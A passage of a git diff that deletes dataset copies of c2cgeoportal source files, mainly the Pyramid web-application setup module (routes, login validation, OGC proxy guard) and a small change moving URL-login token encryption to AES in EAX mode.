GPX/KML view - config.add_route("exportgpxkml", "/exportgpxkml") - - # Add routes to the echo service - config.add_route("echo", "/echo", request_method="POST") - - # Add routes to the entry view class - config.add_route("base", "/", static=True) - config.add_route("loginform", "/login.html", request_method="GET") - add_cors_route(config, "/login", "login") - config.add_route("login", "/login", request_method="POST") - add_cors_route(config, "/logout", "login") - config.add_route("logout", "/logout", 
request_method="GET") - add_cors_route(config, "/loginchange", "login") - config.add_route("loginchange", "/loginchange", request_method="POST") - add_cors_route(config, "/loginresetpassword", "login") - config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST") - add_cors_route(config, "/loginuser", "login") - config.add_route("loginuser", "/loginuser", request_method="GET") - config.add_route("testi18n", "/testi18n.html", request_method="GET") - config.add_route("apijs", "/api.js", request_method="GET") - config.add_route("xapijs", "/xapi.js", request_method="GET") - config.add_route("apihelp", "/apihelp.html", request_method="GET") - config.add_route("xapihelp", "/xapihelp.html", request_method="GET") - config.add_route( - "themes", "/themes", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route("invalidate", "/invalidate", request_method="GET") - - # Print proxy routes - config.add_route("printproxy", "/printproxy", request_method="HEAD") - add_cors_route(config, "/printproxy/*all", "print") - config.add_route( - "printproxy_capabilities", "/printproxy/capabilities.json", - request_method="GET", pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_report_create", "/printproxy/report.{format}", - request_method="POST", header=JSON_CONTENT_TYPE - ) - config.add_route( - "printproxy_status", "/printproxy/status/{ref}.json", - request_method="GET" - ) - config.add_route( - "printproxy_cancel", "/printproxy/cancel/{ref}", - request_method="DELETE" - ) - config.add_route( - "printproxy_report_get", "/printproxy/report/{ref}", - request_method="GET" - ) - # For v2 - config.add_route( - "printproxy_info", "/printproxy/info.json", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_create", "/printproxy/create.json", - request_method="POST", - ) - config.add_route( - "printproxy_get", "/printproxy/{file}.printout", - request_method="GET", - ) - - # Full-text search routes - add_cors_route(config, "/fulltextsearch", "fulltextsearch") - config.add_route("fulltextsearch", "/fulltextsearch") - - # Access to raster data - add_cors_route(config, "/raster", "raster") - config.add_route("raster", "/raster", request_method="GET") - - add_cors_route(config, "/profile.{ext}", "profile") - config.add_route("profile.csv", "/profile.csv", request_method="POST") - config.add_route("profile.json", "/profile.json", request_method="POST") - - # Shortener - add_cors_route(config, "/short/create", "shortener") - config.add_route("shortener_create", "/short/create", request_method="POST") - config.add_route("shortener_get", "/short/{ref}", request_method="GET") - - # Geometry processing - config.add_route("difference", "/difference", request_method="POST") - - # PDF report tool - config.add_route("pdfreport", "/pdfreport/{layername}/{ids}", request_method="GET") - - # Add routes for the "layers" web service - add_cors_route(config, "/layers/*all", "layers") - config.add_route( - "layers_count", "/layers/{layer_id:\\d+}/count", - request_method="GET" - ) - config.add_route( - "layers_metadata", "/layers/{layer_id:\\d+}/md.xsd", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "layers_read_many", - "/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}", - request_method="GET") # supports URLs like /layers/1,2,3 - config.add_route( - "layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="GET") - config.add_route( - 
"layers_create", "/layers/{layer_id:\\d+}", - request_method="POST", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_update", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="PUT", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_delete", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="DELETE") - config.add_route( - "layers_enumerate_attribute_values", - "/layers/{layer_name}/values/{field_name}", - request_method="GET", - pregenerator=C2CPregenerator(), - ) - # There is no view corresponding to that route, it is to be used from - # mako templates to get the root of the "layers" web service - config.add_route("layers_root", "/layers/", request_method="HEAD") - - # Resource proxy (load external url, useful when loading non https content) - config.add_route("resourceproxy", "/resourceproxy", request_method="GET") - - # Scan view decorator for adding routes - config.scan(ignore=["c2cgeoportal_geoportal.scripts", "c2cgeoportal_geoportal.wsgi_app"]) - - if "subdomains" in settings: # pragma: no cover - config.registry.registerUtility( - MultiDomainStaticURLInfo(), IStaticURLInfo) - - # Add the static view (for static resources) - _add_static_view(config, "static", "c2cgeoportal_geoportal:static") - _add_static_view(config, "project", "c2cgeoportal_geoportal:project") - - add_admin_interface(config) - add_static_view(config) - - # Handles the other HTTP errors raised by the views. Without that, - # the client receives a status=200 without content. - config.add_view(error_handler, context=HTTPException) - - -def init_dbsessions(settings: dict, config: Configurator, health_check: HealthCheck=None) -> None: - db_chooser = settings.get('db_chooser', {}) - master_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('master', [])] - slave_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('slave', [])] - - slave_prefix = 'sqlalchemy_slave' if 'sqlalchemy_slave.url' in settings else None - - c2cgeoportal_commons.models.DBSession, rw_bind, _ = c2cwsgiutils.db.setup_session( - config, 'sqlalchemy', slave_prefix, force_master=master_paths, force_slave=slave_paths) - c2cgeoportal_commons.models.Base.metadata.bind = rw_bind - c2cgeoportal_commons.models.DBSessions['dbsession'] = c2cgeoportal_commons.models.DBSession - - for dbsession_name, dbsession_config in settings.get('dbsessions', {}).items(): # pragma: nocover - c2cgeoportal_commons.models.DBSessions[dbsession_name] = \ - c2cwsgiutils.db.create_session(config, dbsession_name, **dbsession_config) - - c2cgeoportal_commons.models.Base.metadata.clear() - from c2cgeoportal_commons.models import main - - if health_check is not None: - for name, session in c2cgeoportal_commons.models.DBSessions.items(): - if name == 'dbsession': - health_check.add_db_session_check(session, at_least_one_model=main.Theme) - else: # pragma: no cover - def check(session: Session) -> None: - session.execute('SELECT 1') - health_check.add_db_session_check(session, query_cb=check) diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py deleted file mode 100644 index 4ed6a0a..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py +++ /dev/null @@ -1,769 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2011-2018, Camptocamp SA -# All rights reserved. 
- -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. - -import time -import logging -import mimetypes -import binascii -from urllib.parse import urlsplit - -import c2cwsgiutils -import re -import simplejson as json -from socket import gethostbyname, gaierror -from ipcalc import IP, Network -from Crypto.Cipher import AES -import importlib - -import zope.event.classhandler -from pyramid.config import Configurator -from pyramid_mako import add_mako_renderer -from pyramid.interfaces import IStaticURLInfo -from pyramid.httpexceptions import HTTPException -import pyramid.security - -from papyrus.renderers import GeoJSON, XSD - -import c2cwsgiutils.db -from c2cwsgiutils.health_check import HealthCheck -from sqlalchemy.orm import Session - -import c2cgeoportal_commons.models -from c2cgeoportal_geoportal.lib import dbreflection, caching, \ - C2CPregenerator, MultiDomainStaticURLInfo, checker, check_collector - -log = logging.getLogger(__name__) - -# used by (sql|form)alchemy - -# Header predicate to accept only JSON content -# OL/cgxp are not setting the correct content type for JSON. We have to accept -# XML as well even though JSON is actually send. 
-JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)" - - -class DecimalJSON: - def __init__(self, jsonp_param_name="callback"): - self.jsonp_param_name = jsonp_param_name - - def __call__(self, info): - def _render(value, system): - ret = json.dumps(value, use_decimal=True) - request = system.get("request") - if request is not None: - callback = request.params.get(self.jsonp_param_name) - if callback is None: - request.response.content_type = "application/json" - else: - request.response.content_type = "text/javascript" - ret = "{callback!s}({json!s});".format( - callback=callback, - json=ret - ) - return ret - return _render - - -INTERFACE_TYPE_CGXP = "cgxp" -INTERFACE_TYPE_NGEO = "ngeo" -INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo" - - -def add_interface( - config, interface_name="desktop", interface_type=INTERFACE_TYPE_CGXP, default=False, **kwargs -): # pragma: no cover - if interface_type == INTERFACE_TYPE_CGXP: - add_interface_cgxp( - config, - interface_name=interface_name, - route_names=(interface_name, interface_name + ".js"), - routes=( - "/" if default else "/{0!s}".format(interface_name), - "/{0!s}.js".format(interface_name) - ), - renderers=("/{0!s}.html".format(interface_name), "/{0!s}.js".format(interface_name)), - **kwargs - ) - - elif interface_type == INTERFACE_TYPE_NGEO: - route = "/" if default else "/{0!s}".format(interface_name) - add_interface_ngeo( - config, - interface_name=interface_name, - route_name=interface_name, - route=route, - renderer="/{0!s}.html".format(interface_name), - **kwargs - ) - - -def add_interface_cgxp( - config, interface_name, route_names, routes, renderers, permission=None): # pragma: no cover - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_names[0], routes[0]) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_index_vars", - route_name=route_names[0], - renderer=renderers[0], - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - config.add_route( - "{0!s}theme".format(route_names[0]), - "{0!s}{1!s}theme/{{themes}}".format(routes[0], "" if routes[0][-1] == "/" else "/"), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_permalinktheme_vars", - route_name="{0!s}theme".format(route_names[0]), - renderer=renderers[0], - permission=permission - ) - config.add_route( - route_names[1], routes[1], - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_viewer_vars", - route_name=route_names[1], - renderer=renderers[1], - permission=permission - ) - - -ngeo_static_init = False - - -def add_interface_ngeo( - config, interface_name, route_name, route, renderer, permission=None): # pragma: no cover - # Cannot be at the header to do not load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_name, route, request_method="GET") - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_index_vars", - route_name=route_name, - renderer=renderer, - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - 
config.add_route( - "{}theme".format(route_name), - "{}{}theme/{{themes}}".format(route, "" if route[-1] == "/" else "/"), - request_method="GET", - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_permalinktheme_vars", - route_name="{}theme".format(route_name), - renderer=renderer, - permission=permission - ) - - global ngeo_static_init - if not ngeo_static_init: - add_static_view_ngeo(config) - ngeo_static_init = True - - -def add_static_view_ngeo(config): # pragma: no cover - """ Add the project static view for ngeo """ - package = config.get_settings()["package"] - _add_static_view(config, "static-ngeo", "{0!s}_geoportal:static-ngeo".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static-ngeo/".format(package) - ) - config.add_static_view( - name=package, - path="{0!s}_geoportal:static".format(package), - cache_max_age=int(config.get_settings()["default_max_age"]) - ) - - mimetypes.add_type("text/css", ".less") - - -def add_admin_interface(config): - if config.get_settings().get("enable_admin_interface", False): - config.add_request_method( - # pylint: disable=not-callable - lambda request: c2cgeoportal_commons.models.DBSession(), 'dbsession', reify=True - ) - config.include('c2cgeoportal_admin', route_prefix='/admin') - - -def add_static_view(config): - """ Add the project static view for CGXP """ - package = config.get_settings()["package"] - _add_static_view(config, "static-cgxp", "{0!s}_geoportal:static".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static/".format(package) - ) - - -CACHE_PATH = [] - - -def _add_static_view(config, name, path): - from c2cgeoportal_geoportal.lib.cacheversion import version_cache_buster - config.add_static_view( - name=name, - path=path, - cache_max_age=int(config.get_settings()["default_max_age"]), - ) - config.add_cache_buster(path, version_cache_buster) - CACHE_PATH.append(name) - - -def locale_negotiator(request): - lang = request.params.get("lang") - if lang is None: - lang = request.cookies.get('_LOCALE_') - else: - request.response.set_cookie('_LOCALE_', lang) - if lang is None: - # if best_match returns None then use the default_locale_name configuration variable - return request.accept_language.best_match( - request.registry.settings.get("available_locale_names"), - default_match=request.registry.settings.get("default_locale_name")) - return lang - - -def _match_url_start(reference, value): - """ - Checks that the val URL starts like the ref URL. - """ - reference_parts = reference.rstrip("/").split("/") - value_parts = value[0:len(reference_parts)] - return reference_parts == value_parts - - -def is_valid_referer(request, settings): - if request.referer is not None: - referer = urlsplit(request.referer)._replace(query="", fragment="").geturl().rstrip("/").split("/") - list_ = settings.get("authorized_referers", []) - return any(_match_url_start(e, referer) for e in list_) - else: - return True - - -def create_get_user_from_request(settings): - def get_user_from_request(request, username=None): - """ Return the User object for the request. 
- - Return ``None`` if: - * user is anonymous - * it does not exist in the database - * the referer is invalid - """ - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - - try: - if "auth" in request.params: - auth_enc = request.params.get("auth") - - if auth_enc is not None: - urllogin = request.registry.settings.get("urllogin", {}) - aeskey = urllogin.get("aes_key") - if aeskey is None: # pragma: nocover - raise Exception("urllogin is not configured") - now = int(time.time()) - data = binascii.unhexlify(auth_enc.encode('ascii')) - nonce = data[0:16] - tag = data[16:32] - ciphertext = data[32:] - cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX, nonce) - auth = json.loads(cipher.decrypt_and_verify(ciphertext, tag).decode("utf-8")) - - if "t" in auth and "u" in auth and "p" in auth: - timestamp = int(auth["t"]) - if now < timestamp and request.registry.validate_user( - request, auth["u"], auth["p"] - ): - headers = pyramid.security.remember(request, auth["u"]) - request.response.headerlist.extend(headers) - except Exception as e: - log.error("URL login error: %s.", e, exc_info=True) - - if not hasattr(request, "is_valid_referer"): - request.is_valid_referer = is_valid_referer(request, settings) - if not request.is_valid_referer: - log.warning( - "Invalid referer for %s: %s", request.path_qs, repr(request.referer) - ) - return None - - if not hasattr(request, "user_"): - request.user_ = None - if username is None: - username = request.authenticated_userid - if username is not None: - # We know we will need the role object of the - # user so we use joined loading - request.user_ = DBSession.query(User) \ - .filter_by(username=username) \ - .first() - - return request.user_ - return get_user_from_request - - -def set_user_validator(config, user_validator): - """ Call this function to register a user validator function. - - The validator function is passed three arguments: ``request``, - ``username``, and ``password``. The function should return the - user name if the credentials are valid, and ``None`` otherwise. - - The validator should not do the actual authentication operation - by calling ``remember``, this is handled by the ``login`` view. - """ - def register(): - config.registry.validate_user = user_validator - config.action("user_validator", register) - - -def default_user_validator(request, username, password): - """ - Validate the username/password. This is c2cgeoportal's - default user validator. - Return None if we are anonymous, the string to remember otherwise. - """ - del request # unused - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - user = DBSession.query(User).filter_by(username=username).first() - if user is None: - log.info('Unknow user "{}" tried to log in'.format(username)) - return None - if user.deactivated: - log.info('Deactivated user "{}" tried to log in'.format(username)) - return None - if user.expired(): - log.info('Expired user "{}" tried to log in'.format(username)) - return None - if not user.validate_password(password): - log.info('User "{}" tried to log in with bad credentials'.format(username)) - return None - return username - - -class OgcproxyRoutePredicate: - """ Serve as a custom route predicate function for ogcproxy. - We do not want the OGC proxy to be used to reach the app's - mapserv script. We just return False if the url includes - "mapserv". It is rather drastic, but works for us. 
""" - - def __init__(self, val, config): - del val # unused - self.private_networks = [ - Network("127.0.0.0/8"), - Network("10.0.0.0/8"), - Network("172.16.0.0/12"), - Network("192.168.0.0/16"), - ] - - def __call__(self, context, request): - url = request.params.get("url") - if url is None: - return False - - parts = urlsplit(url) - try: - ip = IP(gethostbyname(parts.netloc)) - except gaierror as e: - log.info("Unable to get host name for {0!s}: {1!s}".format(url, e)) - return False - for net in self.private_networks: - if ip in net: - return False - return True - - @staticmethod - def phash(): # pragma: no cover - return "" - - -class MapserverproxyRoutePredicate: - """ Serve as a custom route predicate function for mapserverproxy. - If the hide_capabilities setting is set and is true then we want to - return 404s on GetCapabilities requests.""" - - def __init__(self, val, config): - pass - - def __call__(self, context, request): - hide_capabilities = request.registry.settings.get("hide_capabilities") - if not hide_capabilities: - return True - params = dict( - (k.lower(), v.lower()) for k, v in request.params.items() - ) - return "request" not in params or params["request"] != "getcapabilities" - - @staticmethod - def phash(): - return "" - - -def add_cors_route(config, pattern, service): - """ - Add the OPTIONS route and view need for services supporting CORS. - """ - def view(request): # pragma: no cover - from c2cgeoportal_geoportal.lib.caching import set_common_headers, NO_CACHE - return set_common_headers(request, service, NO_CACHE) - - name = pattern + "_options" - config.add_route(name, pattern, request_method="OPTIONS") - config.add_view(view, route_name=name) - - -def error_handler(http_exception, request): # pragma: no cover - """ - View callable for handling all the exceptions that are not already handled. - """ - log.warning("%s returned status code %s", request.url, - http_exception.status_code) - return caching.set_common_headers( - request, "error", caching.NO_CACHE, http_exception, vary=True - ) - - -def call_hook(settings, name, *args, **kwargs): - hooks = settings.get("hooks", {}) - hook = hooks.get(name) - if hook is None: - return - parts = hook.split(".") - module = importlib.import_module(".".join(parts[0:-1])) - function = getattr(module, parts[-1]) - function(*args, **kwargs) - - -def includeme(config): - """ - This function returns a Pyramid WSGI application. 
- """ - - settings = config.get_settings() - - config.include("c2cgeoportal_commons") - - call_hook(settings, "after_settings", settings) - - get_user_from_request = create_get_user_from_request(settings) - config.add_request_method(get_user_from_request, name="user", property=True) - config.add_request_method(get_user_from_request, name="get_user") - - # Configure 'locale' dir as the translation dir for c2cgeoportal app - config.add_translation_dirs("c2cgeoportal_geoportal:locale/") - - config.include('c2cwsgiutils.pyramid.includeme') - health_check = HealthCheck(config) - - # Initialise DBSessions - init_dbsessions(settings, config, health_check) - - # Initialize the dbreflection module - dbreflection.init() - - checker.init(config, health_check) - check_collector.init(config, health_check) - - # dogpile.cache configuration - if 'cache' in settings: - caching.init_region(settings['cache']) - from c2cgeoportal_commons.models.main import InvalidateCacheEvent - - @zope.event.classhandler.handler(InvalidateCacheEvent) - def handle(event: InvalidateCacheEvent): - del event - caching.invalidate_region() - - # Register a tween to get back the cache buster path. - config.add_tween("c2cgeoportal_geoportal.lib.cacheversion.CachebusterTween") - config.add_tween("c2cgeoportal_geoportal.lib.webpack.WebpackTween") - - # Bind the mako renderer to other file extensions - add_mako_renderer(config, ".html") - add_mako_renderer(config, ".js") - - # Add the "geojson" renderer - config.add_renderer("geojson", GeoJSON()) - - # Add decimal json renderer - config.add_renderer("decimaljson", DecimalJSON()) - - # Add the "xsd" renderer - config.add_renderer("xsd", XSD( - sequence_callback=dbreflection.xsd_sequence_callback - )) - - # Add the set_user_validator directive, and set a default user validator - config.add_directive("set_user_validator", set_user_validator) - config.set_user_validator(default_user_validator) - - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - config.add_route('dynamic', '/dynamic.js', request_method="GET") - config.add_view( - Entry, - attr="get_ngeo_index_vars", - route_name='dynamic', - renderer='/dynamic.js' - ) - if settings.get("ogcproxy_enable", False): # pragma: no cover - # Add an OGCProxy view - config.add_route_predicate("ogc_server", OgcproxyRoutePredicate) - config.add_route( - "ogcproxy", "/ogcproxy", - ogc_server=True - ) - config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy") - - # Add routes to the mapserver proxy - config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate) - config.add_route( - "mapserverproxy", "/mapserv_proxy", - mapserverproxy=True, pregenerator=C2CPregenerator(role=True), - ) - - # Add route to the tinyows proxy - config.add_route( - "tinyowsproxy", "/tinyows_proxy", - pregenerator=C2CPregenerator(role=True), - ) - - # Add routes to csv view - config.add_route("csvecho", "/csv", request_method="POST") - - # Add route to the export GPX/KML view - config.add_route("exportgpxkml", "/exportgpxkml") - - # Add routes to the echo service - config.add_route("echo", "/echo", request_method="POST") - - # Add routes to the entry view class - config.add_route("base", "/", static=True) - config.add_route("loginform", "/login.html", request_method="GET") - add_cors_route(config, "/login", "login") - config.add_route("login", "/login", request_method="POST") - add_cors_route(config, "/logout", "login") - config.add_route("logout", "/logout", 
request_method="GET") - add_cors_route(config, "/loginchange", "login") - config.add_route("loginchange", "/loginchange", request_method="POST") - add_cors_route(config, "/loginresetpassword", "login") - config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST") - add_cors_route(config, "/loginuser", "login") - config.add_route("loginuser", "/loginuser", request_method="GET") - config.add_route("testi18n", "/testi18n.html", request_method="GET") - config.add_route("apijs", "/api.js", request_method="GET") - config.add_route("xapijs", "/xapi.js", request_method="GET") - config.add_route("apihelp", "/apihelp.html", request_method="GET") - config.add_route("xapihelp", "/xapihelp.html", request_method="GET") - config.add_route( - "themes", "/themes", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route("invalidate", "/invalidate", request_method="GET") - - # Print proxy routes - config.add_route("printproxy", "/printproxy", request_method="HEAD") - add_cors_route(config, "/printproxy/*all", "print") - config.add_route( - "printproxy_capabilities", "/printproxy/capabilities.json", - request_method="GET", pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_report_create", "/printproxy/report.{format}", - request_method="POST", header=JSON_CONTENT_TYPE - ) - config.add_route( - "printproxy_status", "/printproxy/status/{ref}.json", - request_method="GET" - ) - config.add_route( - "printproxy_cancel", "/printproxy/cancel/{ref}", - request_method="DELETE" - ) - config.add_route( - "printproxy_report_get", "/printproxy/report/{ref}", - request_method="GET" - ) - # For v2 - config.add_route( - "printproxy_info", "/printproxy/info.json", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_create", "/printproxy/create.json", - request_method="POST", - ) - config.add_route( - "printproxy_get", "/printproxy/{file}.printout", - request_method="GET", - ) - - # Full-text search routes - add_cors_route(config, "/fulltextsearch", "fulltextsearch") - config.add_route("fulltextsearch", "/fulltextsearch") - - # Access to raster data - add_cors_route(config, "/raster", "raster") - config.add_route("raster", "/raster", request_method="GET") - - add_cors_route(config, "/profile.{ext}", "profile") - config.add_route("profile.csv", "/profile.csv", request_method="POST") - config.add_route("profile.json", "/profile.json", request_method="POST") - - # Shortener - add_cors_route(config, "/short/create", "shortener") - config.add_route("shortener_create", "/short/create", request_method="POST") - config.add_route("shortener_get", "/short/{ref}", request_method="GET") - - # Geometry processing - config.add_route("difference", "/difference", request_method="POST") - - # PDF report tool - config.add_route("pdfreport", "/pdfreport/{layername}/{ids}", request_method="GET") - - # Add routes for the "layers" web service - add_cors_route(config, "/layers/*all", "layers") - config.add_route( - "layers_count", "/layers/{layer_id:\\d+}/count", - request_method="GET" - ) - config.add_route( - "layers_metadata", "/layers/{layer_id:\\d+}/md.xsd", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "layers_read_many", - "/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}", - request_method="GET") # supports URLs like /layers/1,2,3 - config.add_route( - "layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="GET") - config.add_route( - 
"layers_create", "/layers/{layer_id:\\d+}", - request_method="POST", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_update", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="PUT", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_delete", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="DELETE") - config.add_route( - "layers_enumerate_attribute_values", - "/layers/{layer_name}/values/{field_name}", - request_method="GET", - pregenerator=C2CPregenerator(), - ) - # There is no view corresponding to that route, it is to be used from - # mako templates to get the root of the "layers" web service - config.add_route("layers_root", "/layers/", request_method="HEAD") - - # Resource proxy (load external url, useful when loading non https content) - config.add_route("resourceproxy", "/resourceproxy", request_method="GET") - - # Scan view decorator for adding routes - config.scan(ignore=["c2cgeoportal_geoportal.scripts", "c2cgeoportal_geoportal.wsgi_app"]) - - if "subdomains" in settings: # pragma: no cover - config.registry.registerUtility( - MultiDomainStaticURLInfo(), IStaticURLInfo) - - # Add the static view (for static resources) - _add_static_view(config, "static", "c2cgeoportal_geoportal:static") - _add_static_view(config, "project", "c2cgeoportal_geoportal:project") - - add_admin_interface(config) - add_static_view(config) - - # Handles the other HTTP errors raised by the views. Without that, - # the client receives a status=200 without content. - config.add_view(error_handler, context=HTTPException) - - -def init_dbsessions(settings: dict, config: Configurator, health_check: HealthCheck=None) -> None: - db_chooser = settings.get('db_chooser', {}) - master_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('master', [])] - slave_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('slave', [])] - - slave_prefix = 'sqlalchemy_slave' if 'sqlalchemy_slave.url' in settings else None - - c2cgeoportal_commons.models.DBSession, rw_bind, _ = c2cwsgiutils.db.setup_session( - config, 'sqlalchemy', slave_prefix, force_master=master_paths, force_slave=slave_paths) - c2cgeoportal_commons.models.Base.metadata.bind = rw_bind - c2cgeoportal_commons.models.DBSessions['dbsession'] = c2cgeoportal_commons.models.DBSession - - for dbsession_name, dbsession_config in settings.get('dbsessions', {}).items(): # pragma: nocover - c2cgeoportal_commons.models.DBSessions[dbsession_name] = \ - c2cwsgiutils.db.create_session(config, dbsession_name, **dbsession_config) - - c2cgeoportal_commons.models.Base.metadata.clear() - from c2cgeoportal_commons.models import main - - if health_check is not None: - for name, session in c2cgeoportal_commons.models.DBSessions.items(): - if name == 'dbsession': - health_check.add_db_session_check(session, at_least_one_model=main.Theme) - else: # pragma: no cover - def check(session: Session) -> None: - session.execute('SELECT 1') - health_check.add_db_session_check(session, query_cb=check) diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff deleted file mode 100644 index a016355..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff +++ /dev/null @@ -1,20 +0,0 @@ -diff --git a/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py b/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py - 
index 290aac93ed6e3874bb3789b0f5a0852b68cc47fe..14388c3d85ab164d7b36b1331534913a1c9d6c9a 100644
- --- a/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py
- +++ b/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py
-@@ -45,12 +45,13 @@ def create_token(aeskey, user, password, valid):
-     if aeskey is None:
-         print("urllogin is not configured")
-         exit(1)
--    cipher = AES.new(aeskey)
-+    cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX)
-     data = json.dumps(auth)
-     mod_len = len(data) % 16
-     if mod_len != 0:
-         data += "".join([" " for i in range(16 - mod_len)])
--    return binascii.hexlify(cipher.encrypt(data.encode("utf-8"))).decode("utf-8")
-+    ciphertext, tag = cipher.encrypt_and_digest(data.encode("utf-8"))
-+    return binascii.hexlify(cipher.nonce + tag + ciphertext).decode("ascii")
- 
- 
- def main():
diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py
deleted file mode 100644
index 4ef637d..0000000
--- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py
+++ /dev/null
@@ -1,72 +0,0 @@
-# -*- coding: utf-8 -*-
-
-# Copyright (c) 2017-2018, Camptocamp SA
-# All rights reserved.
-
-# Redistribution and use in source and binary forms, with or without
-# modification, are permitted provided that the following conditions are met:
-
-# 1. Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# 2. Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
